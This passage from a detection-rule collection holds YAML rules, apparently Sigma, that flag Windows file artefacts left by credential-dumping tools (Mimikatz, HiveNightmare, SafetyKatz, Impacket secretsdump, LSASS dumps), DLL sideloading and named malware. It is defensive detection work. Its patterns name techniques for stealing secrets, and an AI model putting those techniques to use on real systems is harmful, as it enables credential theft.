    "content": "title: HackTool - Typical HiveNightmare SAM File Export\nid: 6ea858a8-ba71-4a12-b2cc-5d83312404c7\nstatus: test\ndescription: Detects files written by the different tools that exploit HiveNightmare\nreferences:\n    - https://github.com/GossiTheDog/HiveNightmare\n    - https://github.com/FireFart/hivenightmare/\n    - https://github.com/WiredPulse/Invoke-HiveNightmare\n    - https://twitter.com/cube0x0/status/1418920190759378944\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-23\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - cve.2021-36934\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        - TargetFilename|contains:\n              - '\\hive_sam_'  # Go version\n              - '\\SAM-2021-'  # C++ version\n              - '\\SAM-2022-'  # C++ version\n              - '\\SAM-2023-'  # C++ version\n              - '\\SAM-haxx'   # Early C++ versions\n              - '\\Sam.save'   # PowerShell version\n        - TargetFilename: 'C:\\windows\\temp\\sam'  # C# version of HiveNightmare\n    condition: selection\nfalsepositives:\n    - Files that accidentally contain these strings\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml",
    "content": "title: HackTool - Inveigh Execution Artefacts\nid: bb09dd3e-2b78-4819-8e35-a7c1b874e449\nstatus: test\ndescription: Detects the presence and execution of Inveigh via dropped artefacts\nreferences:\n    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs\n    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs\n    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-24\nmodified: 2024-06-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\Inveigh-Log.txt'\n            - '\\Inveigh-Cleartext.txt'\n            - '\\Inveigh-NTLMv1Users.txt'\n            - '\\Inveigh-NTLMv2Users.txt'\n            - '\\Inveigh-NTLMv1.txt'\n            - '\\Inveigh-NTLMv2.txt'\n            - '\\Inveigh-FormInput.txt'\n            - '\\Inveigh.dll'\n            - '\\Inveigh.exe'\n            - '\\Inveigh.ps1'\n            - '\\Inveigh-Relay.ps1'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_krbrelay_remote_ioc.yml",
    "content": "title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators\nid: 3ab79e90-9fab-4cdf-a7b2-6522bc742adb\nstatus: test\ndescription: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.\nreferences:\n    - https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\windows\\temp\\sam.tmp'\n            - ':\\windows\\temp\\sec.tmp'\n            - ':\\windows\\temp\\sys.tmp'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml",
    "content": "title: HackTool - Mimikatz Kirbi File Creation\nid: 9e099d99-44c2-42b6-a6d8-54c3545cab29\nrelated:\n    - id: 034affe8-6170-11ec-844f-0f78aa0c4d66\n      type: obsolete\nstatus: test\ndescription: Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.\nreferences:\n    - https://cobalt.io/blog/kerberoast-attack-techniques\n    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/\nauthor: Florian Roth (Nextron Systems), David ANDRE\ndate: 2021-11-08\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1558\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.kirbi' # Kerberos tickets\n            - 'mimilsa.log' # MemSSP default file\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_nppspy.yml",
    "content": "title: HackTool - NPPSpy Hacktool Usage\nid: cad1fe90-2406-44dc-bd03-59d0b58fe722\nstatus: test\ndescription: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy\n    - https://twitter.com/0gtweet/status/1465282548494487554\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-29\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\NPPSpy.txt'\n            - '\\NPPSpy.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml",
    "content": "title: HackTool - Powerup Write Hijack DLL\nid: 602a1f13-c640-4d73-b053-be9a2fa58b96\nstatus: test\ndescription: |\n    Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\n    In it's default mode, it builds a self deleting .bat file which executes malicious command.\n    The detection rule relies on creation of the malicious bat file (debug.bat by default).\nreferences:\n    - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/\nauthor: Subhash Popuri (@pbssubhash)\ndate: 2021-08-21\nmodified: 2024-06-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith: '.bat'\n    condition: selection\nfalsepositives:\n    - Any powershell script that creates bat files # highly unlikely (untested)\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml",
    "content": "title: HackTool - QuarksPwDump Dump File\nid: 847def9e-924d-4e90-b7c4-5f581395a2b4\nstatus: test\ndescription: Detects a dump file written by QuarksPwDump password dumper\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-10\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\SAM-'\n            - '.dmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml",
    "content": "title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump\nid: 6e2a900a-ced9-4e4a-a9c2-13e706f9518a\nstatus: test\ndescription: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.\nreferences:\n    - https://github.com/Porchetta-Industries/CrackMapExec\n    - https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py\nauthor: SecurityAura\ndate: 2022-11-16\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        # CommandLine|contains: 'RemoteRegistry' # Uncomment this line if you collect CommandLine data for files events from more accuracy\n        TargetFilename|re: '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml",
    "content": "title: HackTool - SafetyKatz Dump Indicator\nid: e074832a-eada-4fd7-94a1-10642b130e16\nstatus: test\ndescription: Detects default lsass dump filename generated by SafetyKatz.\nreferences:\n    - https://github.com/GhostPack/SafetyKatz\n    - https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63\nauthor: Markus Neis\ndate: 2018-07-24\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\Temp\\debug.bin'\n    condition: selection\nfalsepositives:\n    - Rare legitimate files with similar filename structure\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_impacket_file_indicators.yml",
    "content": "title: HackTool - Impacket File Indicators\nid: 03f4ca17-de95-428d-a75a-4ee78b047256\nrelated:\n    - id: 6e2a900a-ced9-4e4a-a9c2-13e706f9518a\n      type: similar\nstatus: experimental\ndescription: Detects file creation events with filename patterns used by Impacket.\nreferences:\n    - https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/\n    - https://github.com/fortra/impacket\nauthor: \"The DFIR Report, IrishDeath\"\ndate: 2025-05-19\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_names_re:\n        TargetFilename|re: '\\\\sessionresume_[a-zA-Z]{8}$' # https://github.com/fortra/impacket/blob/ead516a1209742efc7ac550707a9304ba08681e9/impacket/examples/secretsdump.py#L1925C38-L1925C51\n    condition: selection_names_re\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml",
    "content": "title: Potential Initial Access via DLL Search Order Hijacking\nid: dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c\nstatus: test\ndescription: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc\n    - https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1566\n    - attack.t1566.001\n    - attack.initial-access\n    - attack.t1574\n    - attack.t1574.001\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # add more processes when you find them\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\MSACCESS.EXE'\n            - '\\MSPUB.EXE'\n            - '\\fltldr.exe'\n            - '\\cmd.exe'\n            - '\\certutil.exe'\n            - '\\mshta.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\curl.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith: '.dll'\n        TargetFilename|contains|all:\n            - '\\Users\\'\n            - '\\AppData\\'\n        TargetFilename|contains:\n            # add more suspicious paths when you find them\n            - '\\Microsoft\\OneDrive\\'\n            - '\\Microsoft OneDrive\\'\n            - '\\Microsoft\\Teams\\'\n            - '\\Local\\slack\\app-'\n            - '\\Local\\Programs\\Microsoft VS Code\\'\n    filter:\n        Image|endswith: '\\cmd.exe'\n        TargetFilename|contains|all:\n            - '\\Users\\'\n            - '\\AppData\\'\n            - '\\Microsoft\\OneDrive\\'\n            - '\\api-ms-win-core-'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml",
    "content": "title: Installation of TeamViewer Desktop\nid: 9711de76-5d4f-4c50-a94f-21e4e8f8384d\nstatus: test\ndescription: TeamViewer_Desktop.exe is create during install\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-01-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\TeamViewer_Desktop.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml",
    "content": "title: Malicious DLL File Dropped in the Teams or OneDrive Folder\nid: 1908fcc1-1b92-4272-8214-0fbaf2fa5163\nstatus: test\ndescription: |\n    Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\n    Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (\"iphlpapi.dll\") is sideloaded\nreferences:\n    - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/\nauthor: frack113\ndate: 2022-08-12\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - 'iphlpapi.dll'\n            - '\\AppData\\Local\\Microsoft'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_iso_file_mount.yml",
    "content": "title: ISO File Created Within Temp Folders\nid: 2f9356ae-bf43-41b8-b858-4496d83b2acb\nstatus: test\ndescription: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.\nreferences:\n    - https://twitter.com/Sam0x90/status/1552011547974696960\n    - https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\nauthor: '@sam0x90'\ndate: 2022-07-30\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_1:\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '.zip\\'\n        TargetFilename|endswith: '.iso'\n    selection_2:\n        TargetFilename|contains: '\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n        TargetFilename|endswith: '.iso'\n    condition: 1 of selection*\nfalsepositives:\n    - Potential FP by sysadmin opening a zip file containing a legitimate ISO file\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_iso_file_recent.yml",
    "content": "title: ISO or Image Mount Indicator in Recent Files\nid: 4358e5a5-7542-4dcb-b9f3-87667371839b\nstatus: test\ndescription: |\n    Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\n    This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\nreferences:\n    - https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\n    - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\n    - https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/\n    - https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-11\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.iso.lnk'\n            - '.img.lnk'\n            - '.vhd.lnk'\n            - '.vhdx.lnk'\n        TargetFilename|contains: '\\Microsoft\\Windows\\Recent\\'\n    condition: selection\nfalsepositives:\n    - Cases in which a user mounts an image file for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml",
    "content": "title: GatherNetworkInfo.VBS Reconnaissance Script Output\nid: f92a6f1e-a512-4a15-9735-da09e78d7273\nrelated:\n    - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN\n      type: similar\n    - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp\n      type: similar\nstatus: test\ndescription: Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".\nreferences:\n    - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\n    - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.discovery\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\config'\n        TargetFilename|endswith:\n            - '\\Hotfixinfo.txt'\n            - '\\netiostate.txt'\n            - '\\sysportslog.txt'\n            - '\\VmSwitchLog.evtx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml",
    "content": "title: LSASS Process Memory Dump Files\nid: a5a2d357-1ab8-4675-a967-ef9990a59391\nrelated:\n    - id: db2110f3-479d-42a6-94fb-d35bc1e46492\n      type: obsolete\n    - id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a\n      type: obsolete\nstatus: test\ndescription: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.\nreferences:\n    - https://www.google.com/search?q=procdump+lsass\n    - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml\n    - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/\n    - https://github.com/helpsystems/nanodump\n    - https://github.com/CCob/MirrorDump\n    - https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35\n    - https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-15\nmodified: 2024-10-08\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_1:\n        TargetFilename|endswith:\n            - '\\Andrew.dmp'\n            - '\\Coredump.dmp'\n            - '\\lsass.dmp'\n            - '\\lsass.rar'\n            - '\\lsass.zip'\n            - '\\NotLSASS.zip'  # https://github.com/CCob/MirrorDump\n            - '\\PPLBlade.dmp'  # https://github.com/tastypepperoni/PPLBlade\n            - '\\rustive.dmp' # https://github.com/safedv/RustiveDump/blob/main/src/main.rs#L35\n    selection_2:\n        TargetFilename|contains:\n            - '\\lsass_2'  # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp\n            - '\\lsassdmp'\n            - '\\lsassdump'\n    selection_3:\n        TargetFilename|contains|all:\n            - '\\lsass'\n            - '.dmp'\n    selection_4:\n        TargetFilename|contains: 'SQLDmpr'\n        TargetFilename|endswith: '.mdmp'\n    selection_5:\n        TargetFilename|contains:\n            - '\\nanodump'\n            - '\\proc_' # NativeDump pattern https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258\n        TargetFilename|endswith: '.dmp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml",
    "content": "title: LSASS Process Dump Artefact In CrashDumps Folder\nid: 6902955a-01b7-432c-b32a-6f5f81d8f625\nstatus: test\ndescription: Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nauthor: '@pbssubhash'\ndate: 2022-12-08\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\'\n        TargetFilename|contains: 'lsass.exe.'\n        TargetFilename|endswith: '.dmp'\n    condition: selection\nfalsepositives:\n    - Rare legitimate dump of the process by the operating system due to a crash of lsass\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml",
    "content": "title: WerFault LSASS Process Memory Dump\nid: c3e76af5-4ce0-4a14-9c9a-25ceb8fda182\nstatus: test\ndescription: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials\nreferences:\n    - https://github.com/helpsystems/nanodump\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: C:\\WINDOWS\\system32\\WerFault.exe\n        TargetFilename|contains:\n            - '\\lsass'\n            - 'lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_mal_adwind.yml",
    "content": "title: Adwind RAT / JRAT File Artifact\nid: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1\nrelated:\n    - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71\n      type: derived\nstatus: test\ndescription: Detects javaw.exe in AppData folder as used by Adwind / JRAT\nreferences:\n    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\n    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community\ndate: 2017-11-10\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|contains|all:\n              - '\\AppData\\Roaming\\Oracle\\bin\\java'\n              - '.exe'\n        - TargetFilename|contains|all:\n              - '\\Retrive'\n              - '.vbs'\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml",
    "content": "title: Octopus Scanner Malware\nid: 805c55d9-31e6-4846-9878-c34c75054fe9\nstatus: test\ndescription: Detects Octopus Scanner Malware.\nreferences:\n    - https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain\nauthor: NVISO\ndate: 2020-06-09\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1195\n    - attack.t1195.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\AppData\\Local\\Microsoft\\Cache134.dat'\n            - '\\AppData\\Local\\Microsoft\\ExplorerSync.db'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml",
    "content": "title: File Creation In Suspicious Directory By Msdt.EXE\nid: 318557a5-150c-4c8d-b70e-a9910e199857\nstatus: test\ndescription: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities\nreferences:\n    - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\n    - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\nauthor: Vadim Varganov, Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2023-02-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - cve.2022-30190\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msdt.exe'\n        TargetFilename|contains:\n            - '\\Desktop\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - 'C:\\PerfLogs\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_mysqld_uncommon_file_creation.yml",
    "content": "title: Uncommon File Creation By Mysql Daemon Process\nid: c61daa90-3c1e-4f18-af62-8f288b5c9aaf\nstatus: test\ndescription: |\n    Detects the creation of files with scripting or executable extensions by Mysql daemon.\n    Which could be an indicator of \"User Defined Functions\" abuse to download malware.\nreferences:\n    - https://asec.ahnlab.com/en/58878/\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/\nauthor: Joseph Kamau\ndate: 2024-05-27\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - \\mysqld.exe\n            - \\mysqld-nt.exe\n        TargetFilename|endswith:\n            - '.bat'\n            - '.dat'\n            - '.dll'\n            - '.exe'\n            - '.ps1'\n            - '.psm1'\n            - '.vbe'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_net_cli_artefact.yml",
    "content": "title: Suspicious DotNET CLR Usage Log Artifact\nid: e0b06658-7d1d-4cd3-bf15-03467507ff7c\nrelated:\n    - id: 4508a70e-97ef-4300-b62b-ff27992990ea\n      type: derived\n    - id: e4b63079-6198-405c-abd7-3fe8b0ce3263\n      type: obsolete\nstatus: test\ndescription: Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.\nreferences:\n    - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\n    - https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml\n    - https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008\n    - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\nauthor: frack113, omkar72, oscd.community, Wojciech Lesicki\ndate: 2022-11-18\nmodified: 2023-02-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: UsageLogs folder must be monitored by the sysmon configuration'\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\UsageLogs\\cmstp.exe.log'\n            - '\\UsageLogs\\cscript.exe.log'\n            - '\\UsageLogs\\mshta.exe.log'\n            - '\\UsageLogs\\msxsl.exe.log'\n            - '\\UsageLogs\\regsvr32.exe.log'\n            - '\\UsageLogs\\rundll32.exe.log'\n            - '\\UsageLogs\\svchost.exe.log'\n            - '\\UsageLogs\\wscript.exe.log'\n            - '\\UsageLogs\\wmic.exe.log'\n    filter_main_rundll32:\n        # This filter requires the event to be enriched by additional information such as ParentImage and CommandLine activity\n        ParentImage|endswith: '\\MsiExec.exe'\n        ParentCommandLine|contains: ' -Embedding'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains|all:\n            - 'Temp'\n            - 'zzzzInvokeManagedCustomActionOutOfProc'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml",
    "content": "title: Suspicious File Creation In Uncommon AppData Folder\nid: d7b50671-d1ad-4871-aa60-5aa5b331fe04\nstatus: test\ndescription: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\'\n        TargetFilename|endswith:\n            # Add more as needed\n            - '.bat'\n            - '.cmd'\n            - '.cpl'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.iso'\n            - '.lnk'\n            - '.msi'\n            - '.ps1'\n            - '.psm1'\n            - '.scr'\n            - '.vbe'\n            - '.vbs'\n    filter_main:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains:\n            - '\\AppData\\Local\\'\n            - '\\AppData\\LocalLow\\'\n            - '\\AppData\\Roaming\\'\n    